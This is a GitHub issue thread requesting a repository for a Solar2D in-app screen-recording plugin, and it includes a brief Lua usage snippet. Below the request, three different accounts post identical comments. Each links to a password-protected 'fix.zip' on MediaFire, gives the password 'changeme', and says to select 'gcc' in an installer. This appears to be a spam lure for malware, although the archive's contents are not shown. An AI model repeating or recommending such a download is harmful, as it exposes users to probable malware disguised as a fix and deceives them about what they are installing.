### ISSUE TITLE
Requesting repo for solar2d-plugin_screen_recorder

### ISSUE THREAD

**Issue by labolado** [solar2d/plugins.solar2d.com#65]
### Plugin description

In-App Video Recording + Video Sharing Plugin (Android & iOS) for Solar2d Game Engine.

 
Usage:

```
local SR = require("plugin.screenRecorder")

local function onStart(e)
    if e.isError then
        print(e.errorMessage)
    else
        -- do something
    end
end
-- to start recording screen
SR.start(onStart)
-- ...
-- to stop recording screen
SR.stop()
```

### Desired publisher Id

com.labolado

### Your plugin name

plugin.screenRecorder

### Terms and conditions

- [X] If I receive invitation to the new repo I will read and follow the README in it, and would not abuse the automation

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by QAQ330** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
